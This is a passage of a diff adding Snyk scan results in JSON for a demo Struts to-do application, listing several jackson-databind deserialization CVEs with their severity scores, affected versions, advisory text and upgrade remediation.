+ "modificationTime": "2024-03-11T09:53:36.643590Z", + "socialTrendAlert": false, + 
"severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72446", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.5)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.4", + "2.8.11.2", + "2.9.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.7.9.4)", + "[2.8.0, 2.8.11.2)", + "[2.9.0, 2.9.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/27b4defc270454dea6842bd9279f17387eceb737", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2032", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 5.6, + "modificationTime": "2024-03-11T09:47:14.962980Z" + }, + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:26.624837Z" + } + ], + "cvssSources": [ 
+ { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:53.818908Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.6, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:47:14.962980Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:26.624837Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It may allow content exfiltration (remote access by sending contents over ftp) when untrusted content is deserialized with default typing enabled. This vulnerability is due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-11307`) is not identical to `CVE-2018-12018`,`CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722` and `CVE-2018-14723`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.4, 2.8.11.2, 2.9.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/27b4defc270454dea6842bd9279f17387eceb737)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2032)\n", + "epssDetails": { + "percentile": "0.85803", + "probability": "0.01278", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-11307" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-qr7j-h6gg-jmgc" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:14:00.916831Z", + "functions_new": [ + { + "version": [ + "[,2.7.9.4)", + "[2.8.0, 2.8.11.2)", + "[2.9.0, 2.9.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-05-10T17:10:58Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": 
"jackson-databind" + }, + "publicationTime": "2018-10-11T17:10:50Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:47:26.624837Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72447", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.6)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.4", + "2.8.11.2", + "2.9.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/28badf7ef60ac3e7ef151cd8e8ec010b8479226a", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2058", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:47:31.058577Z" + }, + { + "assigner": "Red Hat", + "severity": 
"medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 5.6, + "modificationTime": "2024-03-11T09:48:43.326081Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:39.092429Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:47:31.058577Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.6, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:43.326081Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attack, if the user is handling untrusted content or using the `Default Typing` feature. This vulnerability is due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-12023`) is not identical to `CVE-2018-12018`, `CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.4, 2.8.11.2, 2.9.6 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/28badf7ef60ac3e7ef151cd8e8ec010b8479226a)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2058)\n", + "epssDetails": { + "percentile": "0.82708", + "probability": "0.00890", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-12023" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-6wqp-v4v6-c87c" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:16:09.944095Z", + "functions_new": [ + { + "version": [ + "[,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-05-29T17:15:50Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": 
"jackson-databind" + }, + "publicationTime": "2018-10-11T17:15:49Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:43.326081Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72448", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.7)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2097", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:45.223431Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": 
"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:22.234808Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:46.637612Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:45.223431Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:22.234808Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks via the ` slf4j-ext` gadget due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14718`) is not identical to `CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n", + "epssDetails": { + "percentile": "0.92634", + "probability": "0.04626", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-14718" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-645p-88qh-w398" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:21:07.540945Z", + "functions_new": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-07-27T17:19:49Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": 
"2018-10-11T17:19:41Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:22.234808Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72449", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.7)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2097", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:48.008907Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + 
"cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:48:33.930153Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:39.195569Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:47:48.008907Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:33.930153Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform an XML External Entity (XXE) Injection via the `JDK` classes due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14720`) is not identical to `CVE-2018-12018`, `CVE-2018-14729`, `CVE-2018-14721`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n", + "epssDetails": { + "percentile": "0.84205", + "probability": "0.01052", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-14720" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-x2w5-5m2g-7h5m" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:21:22.141403Z", + "functions_new": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-07-27T17:20:17Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": 
"2018-10-11T17:19:17Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:33.930153Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72450", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.7)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + 